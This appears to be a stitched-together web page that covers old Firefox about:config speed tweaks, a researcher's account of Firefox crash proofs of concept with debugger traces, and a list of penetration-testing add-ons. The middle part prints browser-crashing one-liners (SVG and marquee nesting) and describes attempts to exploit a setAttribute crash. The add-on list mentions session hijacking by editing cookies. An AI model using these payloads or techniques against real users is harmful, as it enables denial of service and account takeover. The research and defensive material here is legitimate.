How To: Hacking through Mozilla Firefox Add-ons, Tools, Extensions and Plugins (Update)

Mozilla's Firefox browser is good. With a little minor "tweaking", however, you can make Firefox perform up to 40% faster for page transfers. With just a few clicks and some typing, you can experience faster browsing and surfing Firefox. Read below for how.

Here's How:

    Open the Firefox "config" page: click into the Firefox address location bar, and type about:config, press Enter.

    The "Config" file will appear in the Firefox browser as a page with hundreds of lines of code in it. Now, we start by enabling some advanced tabbed options:

    Locate the line browser.tabs.showSingleWindowModePrefs . (tip: press "b" on your keyboard to quick scroll).

    Double click on browser.tabs.showSingleWindowModePrefs . This will set its toggle to "true". Now your advanced and enhanced tabbing should be set.

    Note: in Firefox version 1.5, the command line is singlewindow.openintabs.

    Next: we will increase the "pipeline" RAM ability for Firefox to accommodate more packet transfer. In the same config document, scroll down to the line that says network.http.pipelining . Double click this line to set it to "true".

    Lastly, we will increase the maximum pipeline requests to 100. Find the line that says network.http.pipelining.maxrequests. Double click on it, and a dialog box will pop up. Change the setting from 4 to 100.

    No need to save this file. Simply close and restart Firefox, and you should see an immediate 10% to 40% increase in web page transfer speed, and faster opening of your tabbed windows! Enjoy!




Firefox has been outperforming IE in every department for years, and version 3 is speedier than ever.

But tweak the right settings and you could make it faster still, more than doubling your speed in some situations, all for about five minutes work and for the cost of precisely nothing at all. Here's what you need to do.

1. Enable pipelining

Browsers are normally very polite, sending a request to a server then waiting for a response before continuing. Pipelining is a more aggressive technique that lets them send multiple requests before any responses are received, often reducing page download times. To enable it, type about:config in the address bar, double-click network.http.pipelining and network.http.proxy.pipelining so their values are set to true, then double-click network.http.pipelining.maxrequests and set this to 8.

Keep in mind that some servers don't support pipelining, though, and if you regularly visit a lot of these then the tweak can actually reduce performance. Set network.http.pipelining and network.http.proxy.pipelining to false again if you have any problems.

2. Render quickly

Large, complex web pages can take a while to download. Firefox doesn't want to keep you waiting, so by default will display what it's received so far every 0.12 seconds (the "content notify interval"). While this helps the browser feel snappy, frequent redraws increase the total page load time, so a longer content notify interval will improve performance.

Type about:config and press [Enter], then right-click (Apple users ctrl-click) somewhere in the window and select New > Integer. Type content.notify.interval as your preference name, click OK, enter 500000 (that's five hundred thousand, not fifty thousand) and click OK again.

Right-click again in the window and select New > Boolean. This time create a value called content.notify.ontimer and set it to True to finish the job.

3. Faster loading

If you haven't moved your mouse or touched the keyboard for 0.75 seconds (the content switch threshold) then Firefox enters a low frequency interrupt mode, which means its interface becomes less responsive but your page loads more quickly. Reducing the content switch threshold can improve performance, then, and it only takes a moment.

Type about:config and press [Enter], right-click in the window and select New > Integer. Type content.switch.threshold, click OK, enter 250000 (a quarter of a second) and click OK to finish.

4. No interruptions

You can take the last step even further by telling Firefox to ignore user interface events altogether until the current page has been downloaded. This is a little drastic as Firefox could remain unresponsive for quite some time, but try this and see how it works for you.

Type about:config, press [Enter], right-click in the window and select New > Boolean. Type content.interrupt.parsing, click OK, set the value to False and click OK.

5. Block Flash

Intrusive Flash animations are everywhere, popping up over the content you actually want to read and slowing down your browsing. Fortunately there's a very easy solution. Install the Flashblock extension (flashblock.mozdev.org) and it'll block all Flash applets from loading, so web pages will display much more quickly. And if you discover some Flash content that isn't entirely useless, just click its placeholder to download and view the applet as normal.



6. Increase the cache size

As you browse the web, Firefox stores site images and scripts in a local memory cache, where they can be speedily retrieved if you revisit the same page. If you have plenty of RAM (2 GB or more), leave Firefox running all the time and regularly return to pages, then you can improve performance by increasing this cache size. Type about:config and press [Enter], then right-click anywhere in the window and select New > Integer. Type browser.cache.memory.capacity, click OK, enter 65536 and click OK, then restart your browser to get the new, larger cache.

7. Enable TraceMonkey

TraceMonkey is a new Firefox feature that converts slow Javascript into super-speedy x86 code, and so lets it run some functions anything up to 20 times faster than the current version. It's still buggy so isn't available in the regular Firefox download yet, but if you're willing to risk the odd crash or two then there's an easy way to try it out.

Install the latest nightly build (ftp://ftp.mozilla.org/pub/firefox/nightly/latest-trunk/), launch it, type about:config in the address bar and press Enter. Type JIT in the filter box, then double-click javascript.options.jit.chrome and javascript.options.jit.content to change their values to true, and that's it - you're running the fastest Firefox Javascript engine ever.

8. Compress data

If you've a slow internet connection then it may feel like you'll never get Firefox to perform properly, but that's not necessarily true. Install toonel.net (toonel.net) and this clever Java applet will re-route your web traffic through its own server, compressing it at the same time, so there's much less to download. And it can even compress JPEGs by allowing you to reduce their quality. This all helps to cut your data transfer, useful if you're on a limited 1 GB-per-month account, and can at best double your browsing performance.



I was playing with Firefox to see what crashes it and thought SVG might be a good place to look. I tried combinations of all elements nested together and came across problems with script.

<script>str='';for(i=0;i<0xefff;i++){str+='<script>AAAAAA';};document.write('<svg>'+str+'</svg>');</script>

This causes a complete crash in Firefox but is it only a DoS? It appears so. I booted up windbg…stack overflow push edi.

void
FragmentOrElement::SaveSubtreeState()
{
  uint32_t i, count = mAttrsAndChildren.ChildCount(); // this line overflows
  for (i = 0; i < count; ++i) {
    // one native call frame per level of nesting
    mAttrsAndChildren.ChildAt(i)->SaveSubtreeState();
  }
}

Looks like a DoS to me. It crashes inconsistently, but more consistently if you increase the value. Maybe if it was debugged when it doesn’t crash there might be something more interesting, but I failed, so I’m posting here.

DoS by Marquee

I looked outside of SVG and our old friend marquee had some fun for us.

<script>document.write(Array(184).join('<marquee>'))</script>

This causes the marquee crash

if (aIID.Equals(kThisImplCID))
foundInterface = static_cast(this);
else
NS_INTERFACE_MAP_END//appears to be this line

eax=70339e24 ebx=00000000 ecx=70b4d320 edx=70d9c4ac esi=0be7b004 edi=80000000
eip=6fe720c8 esp=00e63000 ebp=00e631dc iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202

6fe720c8 56 push esi

Crashes Firefox again but plain old Stack Exhaustion DoS again.
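
Both crashes are described above as stack exhaustion driven by nesting depth. The following added example (not code from the original post or from Firefox) models the SaveSubtreeState recursion on plain JavaScript objects and sets it beside two mitigations, an explicit work list and a nesting cap applied while the tree is built. The node shape and the DEPTH and MAX_DEPTH values are assumptions; in JavaScript the overflow surfaces as a catchable RangeError, whereas native code simply crashes.

```javascript
// Added example. Nodes are plain objects standing in for DOM elements.
const DEPTH = 200000;   // constructed nesting depth, large enough to overflow
const MAX_DEPTH = 512;  // constructed cap for the mitigation below

function makeNode(tag) {
  return { tag, children: [], saved: false };
}

// Build root > child > child ... without recursion. With maxDepth set, nodes
// past the cap are attached as siblings at the deepest allowed level.
function buildChain(requestedDepth, maxDepth = Infinity) {
  const root = makeNode('svg');
  let cur = root;
  let depth = 0; // depth of `cur`; its children sit at depth + 1
  for (let i = 0; i < requestedDepth; i++) {
    const child = makeNode('script');
    cur.children.push(child);
    if (depth + 1 < maxDepth) { cur = child; depth++; }
  }
  return root;
}

// Same shape as the SaveSubtreeState excerpt: one call frame per level.
function saveSubtreeRecursive(node) {
  node.saved = true;
  let visited = 1;
  for (let i = 0; i < node.children.length; i++) {
    visited += saveSubtreeRecursive(node.children[i]);
  }
  return visited;
}

// Mitigation 1: explicit work list on the heap, constant call-stack use.
function saveSubtreeIterative(root) {
  const work = [root];
  let visited = 0;
  while (work.length > 0) {
    const node = work.pop();
    node.saved = true;
    visited++;
    for (const child of node.children) work.push(child);
  }
  return visited;
}

// Deepest level in the tree, measured iteratively.
function measureDepth(root) {
  let max = 0;
  const work = [[root, 0]];
  while (work.length > 0) {
    const [node, d] = work.pop();
    if (d > max) max = d;
    for (const child of node.children) work.push([child, d + 1]);
  }
  return max;
}

// Run the recursive walk and report stack exhaustion instead of dying.
function tryRecursive(root) {
  try {
    return { ok: true, visited: saveSubtreeRecursive(root) };
  } catch (e) {
    if (e instanceof RangeError) return { ok: false, visited: 0 };
    throw e;
  }
}

const deep = buildChain(DEPTH);
const capped = buildChain(DEPTH, MAX_DEPTH); // mitigation 2: cap at build time
console.log('recursive, uncapped:', tryRecursive(deep));
console.log('iterative, uncapped:', saveSubtreeIterative(deep));
console.log('recursive, capped  :', tryRecursive(capped), 'depth', measureDepth(capped));
```
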

Possible stack corruption in Firefox using setAttribute

Lastly, a pretty interesting crash that I reported to Mozilla, which Boris stated was safely crashing, but in windbg there were a few indications of stack corruption and I was hoping to learn more when I reported it. I didn’t :/ so if you have some success please let me know, as I was trying for ages. Here is my report to Mozilla:

Here is a possible stack corruption in Firefox that I’ve been trying to exploit for a few days and I’ve finally given in and reported it. I would be super grateful to anyone who is willing to explain where I’m going right/wrong with this as I want to learn more about exploiting these bugs and also help Mozilla in the process.

PoC
* Note if you increase the value to 0xfffff and more you can get outside of mozalloc and into non mozilla code.

Enough blabber. Ok so Firefox seems to crash when using setAttribute on
various html elements with a large selection of attributes. I couldn’t
narrow down exactly which are causing the problem but it could be just
having a lot of attributes. Passing a large string triggers the crash.

Exception Faulting Address: 0x74111988
First Chance Exception Type: STATUS_BREAKPOINT (0x80000003)

Faulting Instruction:74111988 int 3

Basic Block:
74111988 int 3

Exception Hash (Major/Minor): 0x142182e0.0x360c07ce

Hash Usage : Stack Trace:
Major+Minor : mozalloc!mozalloc_abort+0x2b
Major+Minor : xul!NS_DebugBreak_P+0x1c0
Major+Minor : xul!xpc::CompartmentPrivate::SetLocation+0x3fdf42
Major+Minor : xul!`anonymous namespace'::VirtualAllocHook+0x3f
Major+Minor : mozglue!chunk_alloc_mmap+0x17
Minor : MSVCR100!_getptd_noexit+0x74
Minor : MSVCR100!_errno+0x5
Minor : mozglue!je_malloc+0x369
Minor : xul!mozilla::dom::Element::SetAttr+0x5e2
Minor : xul!nsGenericHTMLElement::SetAttr+0x7a
Minor : xul!nsGenericHTMLFrameElement::SetAttr+0x1c
Minor : xul!mozilla::dom::Element::SetAttribute+0x1bd
Minor : xul!mozilla::dom::ElementBinding::setAttribute+0xa9
Minor : xul!mozilla::dom::ElementBinding::genericMethod+0x85
Minor : mozjs!js::mjit::EnterMethodJIT+0xbf
Minor : mozjs!CheckStackAndEnterMethodJIT+0x93
Minor : mozjs!js::Interpret+0x63bf
Minor : mozjs!js::RunScript+0xac
Minor : mozjs!js::ExecuteKernel+0x163
Minor : mozjs!js::Execute+0x83
Minor : mozjs!JS::Evaluate+0xd6
Minor : xul!nsJSContext::EvaluateString+0x20b
Minor : mozjs!JS::CompileOptions::CompileOptions+0x26
Minor : xul!nsQueryReferent::operator()+0x30
Minor : xul!nsCOMPtr_base::~nsCOMPtr_base+0xe
Minor : xul!nsIScriptElement::BeginEvaluating+0x3f
Minor : xul!nsScriptLoader::ProcessRequest+0x12f
Minor : xul!nsScriptLoader::ProcessScriptElement+0x251
Minor : xul!nsScriptElement::MaybeProcessScript+0xe5
Minor : xul!nsHtml5TreeOpExecutor::RunScript+0x60
Minor : xul!nsHtml5TreeOpExecutor::RunFlushLoop+0x314
Minor : xul!nsHtml5ExecutorFlusher::Run+0x14
Minor : xul!nsThread::ProcessNextEvent+0x279
Minor : xul!NS_ProcessNextEvent_P+0x2e
Minor : xul!mozilla::ipc::MessagePump::Run+0x46
Minor : xul!MessageLoop::RunHandler+0x51
Minor : xul!MessageLoop::Run+0x19
Minor : xul!nsBaseAppShell::Run+0x2c
Minor : xul!nsAppShell::Run+0x14
Minor : xul!XREMain::XRE_mainRun+0x37a
Minor : xul!XREMain::XRE_main+0xeb
Minor : xul!XRE_main+0x30
Minor : firefox!do_main+0x57e
Minor : firefox!wmain+0x7b0
Minor : firefox!__tmainCRTStartup+0x122
Minor : KERNEL32!BaseThreadInitThunk+0xe
Minor : ntdll!__RtlUserThreadStart+0x72
Minor : ntdll!_RtlUserThreadStart+0x1b
Instruction Address: 0x0000000074111988
Source File:
e:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\memory\mozalloc\mozalloc_abort.cpp
Source Line: 30

Description: Breakpoint
Short Description: Breakpoint
Exploitability Classification: UNKNOWN
Recommended Bug Title: Breakpoint starting at
mozalloc!mozalloc_abort+0x000000000000002b (Hash=0x142182e0.0x360c07ce)

What’s weird is that it hits a break point that I didn’t set. A software
breakpoint in Firefox maybe? And there’s indication of stack corruption
because symbols aren’t found. I mess around with this and it’s possible
to break out of the mozalloc into another handler (outside the mozilla
code) I’m assuming this is good because it gets to memory it shouldn’t.

I looked in the calls window in windbg and saw this:
03 0114d71c 74a47107 xul!`anonymous namespace'::VirtualAllocHook(void *
aAddress = 0x41414141, unsigned long aSize = 0x41414141, unsigned long
aAllocationType = 0x41414141, unsigned long aProtect = 0x41414141)+0x3f
(FPO: [Non-Fpo]) (CONV: stdcall)

Which looks cool to me since my code seems to be controlling the address
but still no idea what to do now. I tried heap spraying to 0c0c0c0c and
changing the string I send to \u0c0c0c but with no success.

Increasing the size of the string to 0xffffff results in a different
handler being called (I’m assuming some ms dll).

Basic Block:
74aa2357 rep movs dword ptr es:[edi],dword ptr [esi]
Tainted Input operands: 'ecx','edi','esi'
74aa2359 jmp dword ptr msvcr100!trailupvec (74aa2470)[edx*4]

Exception Hash (Major/Minor): 0x7bb0290d.0x5be6096d

Hash Usage : Stack Trace:
Major+Minor : MSVCR100!memmove+0x57
Major+Minor : xul!AtomImpl::AtomImpl+0x92
Major+Minor : xul!NS_NewAtom+0x8b
Major+Minor : xul!nsAttrValue::ParseAtomArray+0xa6
Major+Minor : xul!nsGenericHTMLElement::ParseAttribute+0x1b5
Minor : xul!nsHTMLIFrameElement::ParseAttribute+0x89
Instruction Address: 0x0000000074aa2357
Source File: f:\dd\vctools\crt_bld\SELF_X86\crt\src\Intel\MEMCPY.ASM
Source Line: 185

Description: User Mode Write AV near NULL
Short Description: WriteAVNearNull
Exploitability Classification: UNKNOWN
Recommended Bug Title: User Mode Write AV near NULL starting at
MSVCR100!memmove+0x0000000000000057 (Hash=0x7bb0290d.0x5be6096d)

User mode write access violations that are near NULL are unknown.



Firefox Add-ons for Security Researchers and Penetration Testers

    FoxyProxy Standard
    FoxyProxy is an advanced proxy management add-on for the Firefox browser. It improves the built-in proxy capabilities of Firefox. There are a few other similar proxy management add-ons available, but it offers more features than other add-ons. Based on URL patterns, it switches the internet connection across one or more proxy servers. When a proxy is in use, it also displays an animated icon. In case you want to see the proxies used by the tool, you can see the logs.

    Add FoxyProxy to your browser from this link: https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/

    Firebug
    Firebug is a nice add-on that integrates a web development tool inside the browser. With this tool, you can edit and debug HTML, CSS and JavaScript live in any webpage to see the effect of changes. It helps in analyzing JS files to find XSS vulnerabilities. It’s a really helpful add-on for security testing professionals in finding DOM based XSS.

    Add Firebug to your browser from this link: https://addons.mozilla.org/en-US/firefox/addon/firebug/

    Web Developer
    Web Developer is another nice add-on that adds various web development tools to the browser. It helps in web application penetration testing.

    Add Web Developer to your browser from this link: https://addons.mozilla.org/de/firefox/addon/web-developer/

    User Agent Switcher
    The User Agent Switcher add-on adds a one-click user agent switch to the browser. It adds a menu and toolbar button to the browser. Whenever you want to switch the user agent, use the browser button. The User Agent Switcher add-on helps in spoofing the browser while performing some attacks.

    Add User Agent Switcher to your browser from this link: https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/
    Live HTTP Headers
    Live HTTP Headers is a really helpful penetration testing add-on for Firefox. It displays live headers of each HTTP request and response. You can also save header information by clicking on the button in the lower left corner. I don’t think that there is any need to tell how important this add-on is for the security testing process.

    Add Live HTTP Headers to Firefox with this link: https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/

    Tamper Data
    Tamper Data is similar to the Live HTTP Headers add-on but has header editing capabilities. With the Tamper Data add-on, you can view and modify HTTP/HTTPS headers and POST parameters. Thus it helps in security testing web applications by modifying POST parameters. It can be used in performing XSS and SQL injection attacks by modifying header data.

    Add the Tamper Data add-on to the Firefox browser with this link: https://addons.mozilla.org/en-US/firefox/addon/tamper-data/

    Hackbar
    Hackbar is a simple penetration tool for Firefox. It helps in testing simple SQL injection and XSS holes. You cannot execute standard exploits but you can easily use it to test whether a vulnerability exists or not. You can also manually submit form data with GET or POST requests. It also has encryption and encoding tools. Most of the time, this tool helps in testing XSS vulnerabilities with encoded XSS payloads. It also supports keyboard shortcuts to perform various tasks.

    I am sure most people in the security field already know about this tool. This tool is mostly used in finding POST XSS vulnerabilities because it can send POST data manually to any page you like. With the ability to manually send POST form data, you can easily bypass client side validations of the page. If your payload is being encoded at client side, you can use an encoding tool to encode your payload and then perform the attack. If the application is vulnerable to XSS, I am sure you will find the vulnerability with the help of the Hackbar add-on in the Firefox browser.

    Add the Hackbar add-on to the Firefox browser with this link: https://addons.mozilla.org/en-US/firefox/addon/hackbar/

    Websecurify
    Websecurify is a nice penetration testing tool that is also available as an add-on for Firefox. We have already covered Websecurify in detail in a previous article. Websecurify can detect most common vulnerabilities in web applications. This tool can easily detect XSS, SQL injection and other web application vulnerabilities. Unlike other listed tools, it is a complete penetration testing tool in itself, available as a browser add-on. It gives most of the features available in the standalone tool.

    Add Websecurify to the Firefox browser with this link: https://addons.mozilla.org/en-us/firefox/addon/websecurify/

    Add N Edit Cookies
    “Add N Edit Cookies” is a cookie editing add-on that allows you to add and edit cookie data in your browser. With this tool, you can easily add session data manually in cookies. This tool is used in session hijacking attacks when you have the active cookies of the user. Edit your cookies to add the data and hijack the account.

    To download Add N Edit Cookies to your Firefox browser: https://addons.mozilla.org/en-US/firefox/addon/add-n-edit-cookies-13793/

    XSS Me
    Cross Site Scripting is the most found web application vulnerability. For detecting XSS vulnerabilities in web applications, this add-on can be a useful tool. XSS-Me is used to find reflected XSS vulnerabilities from a browser. It scans all forms of the page, and then performs an attack on the selected pages with pre-defined XSS payloads. After the scan is complete, it lists all the pages that render a payload on the page and may be vulnerable to an XSS attack. Now, you can manually test the web page to find whether the vulnerability exists or not.

    Add XSS Me to your Firefox browser: https://addons.mozilla.org/en-us/firefox/addon/xss-me/

    SQL Inject Me
    SQL Inject Me is another nice Firefox add-on used to find SQL injection vulnerabilities in web applications. This tool does not exploit the vulnerability but displays that it exists. SQL injection is one of the most harmful web application vulnerabilities; it can allow attackers to view, modify, edit, add or delete records in a database. The tool sends escape strings through form fields and tries to search for database error messages. If it finds a database error message, it marks the page as vulnerable. QA testers can use this tool for SQL injection testing.

    Add the SQL Inject Me add-on to your browser: https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me/

    FlagFox
    FlagFox is another interesting add-on. Once installed in the browser, it displays the country’s flag to tell the location of the web server. It also comes with other tools like whois, WOT scorecard and ping.

    Add FlagFox to your browser: https://addons.mozilla.org/en-us/firefox/addon/flagfox/

    CryptoFox
    CryptoFox is an encryption and decryption tool for Mozilla Firefox. It supports most of the available encryption algorithms, so you can easily encrypt or decrypt data with a supported encryption algorithm. This add-on comes with dictionary attack support to crack MD5 passwords. Although it doesn’t have good reviews, it works satisfactorily.

    Add the CryptoFox add-on to your browser: https://addons.mozilla.org/en-US/firefox/addon/cryptofox/

    Access Me
    Access Me is another add-on for security testing professionals. This add-on is developed by the company that works on XSS Me and SQL Inject Me. Access Me is the Exploit-Me tool used for testing access vulnerabilities in web applications. This tool works by sending several versions of page requests. A request using the HTTP HEAD verb and a request using a made-up SECCOM verb will be sent. A combination of session and HEAD/SECCOM will also be sent.

    Add Access Me to Firefox from this link: https://addons.mozilla.org/en-US/firefox/addon/access-me/

    SecurityFocus Vulnerabilities search plugin
    The SecurityFocus Vulnerabilities search plugin is not a security tool but a search plugin that lets users search for vulnerabilities in the SecurityFocus database.

    Add this to Firefox from the link: https://addons.mozilla.org/en-us/firefox/addon/securityfocus-vulnerabilities-/

    Packet Storm search plugin
    This is another search plugin that lets users search for tools and exploits from packetstormsecurity.org. The website offers free up-to-date security tools, exploits and advisories.

    Add this to Firefox from the link: https://addons.mozilla.org/en-us/firefox/addon/packet-storm-search-plugin/

    Offsec Exploit-db Search
    This is another plugin similar to the last two above. It also lets users search for vulnerabilities and exploits listed on exploit-db.com. This website is always up-to-date with the latest exploits and vulnerability details.

    Add this to Firefox from the link: https://addons.mozilla.org/en-us/firefox/addon/offsec-exploit-db-search/

    Snort IDS Rule Search
    Snort IDS Rule Search is another search add-on for Firefox. It lets users search for Snort IDS rules on the snort.org website. Snort is the most widely deployed IDS/IPS technology worldwide. It’s an open source network intrusion prevention and detection system with more than 400,000 users.

    Add Snort IDS Rule Search to Firefox here: https://addons.mozilla.org/en-US/firefox/addon/snort-ids-rule-search/

These are a few add-ons that you can use for web application penetration testing. Although you cannot complete a full penetration test with these tools alone, they are useful for most tasks and reduce the need for separate tools.

Hackbar, SQL Inject Me, XSS Me and Websecurify are the browser tools that are widely used for finding vulnerabilities in web applications. The other tools are used for specific work which helps in getting information while penetration testing.
